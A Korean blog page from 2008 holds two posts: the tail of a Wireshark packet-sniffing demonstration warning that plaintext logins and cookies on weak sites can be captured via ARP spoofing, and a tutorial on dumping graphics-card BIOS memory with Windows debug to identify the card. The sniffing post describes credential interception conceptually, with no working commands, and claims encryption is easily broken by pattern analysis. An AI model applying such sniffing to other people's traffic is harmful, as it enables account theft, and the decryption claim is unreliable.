패킷이 많이 잡히네요~   데스티네이션 IP도 표시해줍니다.
패킷헤더에는 많은 정보들이 들어있으니까요....












Wireshark 로 ,  스니핑을 해봤습니다.
패킷 내용이 모두다 나오네요~
뭐 이사람은  cyworld를 하는것같군요...
위 스샷의 내용은 극히 일부에 불과하빈다.



로그인할때 , 아이디 비밀번호가  바로 암호화되지 않고  전송되는 ,  
보안이 취약한  일부 온라인게임이나 ,   웹사이트 ,    웹하드의 계정은
간단하게 훔쳐낼 수 있습니다.

저런 패킷의 내용에 포함되어 있는  쿠키 정보같은것도 손쉽게 빼낼수 있습니다.

 

 

설령 뭐 암호화된다고 하더라도 ,  문자열별 암호화 패턴을 분석해서 시간만 들이면 쉽게 복호화 할수 있겠죠~







어때요~  참 쉽죠?


이렇게 쉬운데 ,   이런 쉬운공격에 당하시면 참 억울해하실 것 같아서 ,  이렇게 알려드리빈다.





이런 공격이 있다는것도 알고 계셔야 할것같아서 , 글을 써봤구요~ (물론 아시는분들도 많을거라 봅니다.)



이제   왜  취약점이 있는   웹사이트에  접근하면 안되는지  대략 감이 오시겠죠~~??
백신 조낸 설치하고 ,  윈도우 업데이트 킹왕짱 설치해놔도...

우연찮게 취약점 있는 사이트에 접근했는데,,,, 그때 누군가가 ARP스푸핑 패킷스니핑을 통해서 , 훔쳐봤다!!

이렇게 되면 뭐 끝나는거죠.


꼭 트로이목마가 아니더라도 , 이런식으로 접근할 수도 있다는 말입니다...

저작자 표시 비영리 변경 금지
신고
by Sone 2008.11.29 22:40

흔히 , 자신이 사용하고 있는 컴퓨터 내부에는  부품이 어떤것이 있는가

를 잘 모르고  컴퓨터를 사용하는 경우가 많다. (초보자인 경우가  대부분 그러하다.)

 

이때 ,  잘못해서 윈도우를  재설치 하거나할때 ,  드라이버를 잡아주는 과정에서  많이 어려움을 겪는다.

모델명을 모를경우  대부분   컴퓨터 본체를 뜯어서  그래픽카드의 모델명이 무엇인지 일일이 확인해야 하는 불편함이 있다.

 

부품중에서도   VGA는   컴퓨터 메인보드의  ROM과 같이   바이오스가 탑재되어 있다.

이러한 바이오스는 부팅할때 , 메모리에 그 정보가 올라가게 되는데 , 항상 일정한 위치에 탑재되게 된다.

 

물론 ,  바이오스가 존재하지 않는  다른 사운드카드라던가 , 랜카드 같은 것들은  덤프를 통해서 정보를 알아낼수가 없을것이다. (추측)

 

우리는   부팅할때  VGA의 바이오스가 메모리에 올라간다는 사실만으로 ,  그래픽카드 드라이버를 설치하지 않았더라도,

또는   컴퓨터 본체를 번거롭게 뜯어서  모델명을 확인하지 않고도,

그래픽카드가  어떠한 종류인지를  자세하게 알아낼 수 있다.

 

 

 

 

 

 

시작 - 실행 - cmd  입력 후 엔터

( 또는  보조프로그램에 있는 "명령프롬프트" 를 실행해도 된다. )

( 또는  윈도우키+R 을 누른뒤   cmd 입력 후 엔터 )

 

 

 

 

 

 

 

 

위와 같이 화면이 나올것이다.

 

이제 여기서  debug  라고 입력하고 엔터를 누른다.

 

 

 

 

 

윈도우에 탑재되어있는  디버그 명령을 이용해서  메모리 주소에 접근할 것이다.

위와 같이  '  -  '  마이너스 프롬프트가 나오면 정상적으로  디버깅모드로 들어간 것이다.

 

간단히  디버그 명령어 몇개를 알아보기 위해서   ?  를 입력하고 엔터를 누른다.

 

 

 

 

 

갖가지 명령어들이 있는데   a 는 assemble을 할수있고 ,  d는 dump  ,   c는 compare ,  s  는  search 등등의 기능들이 있다.

우리는 여기서  d = dump 의  기능을 써서 그래픽카드 정보를 알아낼 것이다.

 

정보를 알아내기전에 ,  심심해서 또 다른것도 알아볼겸 ,   r 을 누르고  엔터를 쳐본다.

 

 

 

 

r은   CPU내에 있는  레지스터의 정보를  보여주는 기능이다.

어큐물레이터 레지스터(AX) , 베이스 레지스터(BX) , 카운터 레지스터(CX) , 데이타 레지스터(DX) , 스택 포인터(SP) , 베이스 포인터(BP) , 소스 인덱스(SI) ,

데스티네이션 인덱스(DI) ,   데이타 세그먼트(DS), 엑스트라 세그먼트(ES) , 코드 세그먼트(CS) , 인스트럭션 포인터(IP) , 각종 플래그   등의 상태값을 보여준다.

 

여기서는 각종 레지스터의 값들을   2바이트  16비트 형으로 보여주고 있지만,

32비트로 본다면 ,   앞에다가  Extend 라는 이름의 약자를 따서  E를 붙여주게 된다.

따라서 이때는  EAX,EBX,ECX,EDX,ESP,EBP,ESI,EDI  로 명칭한다.

 

이러한 레지스터들은   데이터를 처리할때  임시로 정보를 기억하는 곳이다.

 

 

 

이제 대충 debug 의 기능을  훑어본것 같으니  ,  그래픽카드 정보를  본격적으로 알아보자.

 

dc000:0   이라고 입력 후 엔터를 눌러준다.

 

 

 

 

 

위와 같이  이상한  문자들이 출력될 것이다.

 

한두번정도 d 를 더 입력해주게 되면...

 

 

 

 

 

 

위와 같이   우리가 컴퓨터를 부팅할때  VGA의 바이오스 내용이  메모리로 올라갔던  정보가   덤프되어져서 나오게 된다.

 

 

필자는   ATI RadeonHD 3850  256MB GDDR3  PCI-Express 방식의 VGA를 쓰고있다.

 

자세히 보면   RV670 . PCI_EXPRESS.DDR3......GDDR3_8Mx32 256bit 256MB  669e/829m   이라고 나와있는것을 확인할 수 있다.

 

여기서 그래픽카드의 정보를 유추해보자면,

 

RV670 = ATI Radeon HD3850의  코드명

PCI_EXPRESS = PCI-Express 16x 방식의 슬롯에 꽂혀있고  작동한다.

GDDR3 = GDDR3 방식의  그래픽메모리를 사용한다.

8Mx32 =  8MB GDDR3 메모리 칩이  32개 박혀있는것을 뜻한다. 즉 256MB 이다. (실제로 32개가 박혀있진 않을것이고 , 다른 구조일것이다)

256bit = 256비트 메모리 버스로 동작한다.

256MB =  그래픽메모리는 256 메가바이트 이다.

669e / 829m =   그래픽엔진 칩은  669Mhz로 작동하고 ,  메모리 칩은 829Mhz (GDDR3이므로 실제 대역폭은 2배인 1658Mhz) 로 작동한다.

 

 

필자같은경우 ,  위 정보를 토대로 드라이버를 설치할려면 , 

http://www.amd.com 으로 이동하여서  , Support  메뉴에 있는   드라이버 관련 메뉴를 클릭하면,

드라이버를 다운받을 수 있을것이다.

 

저작자 표시 비영리 변경 금지
신고
by Sone 2008.11.29 22:23
| 1 |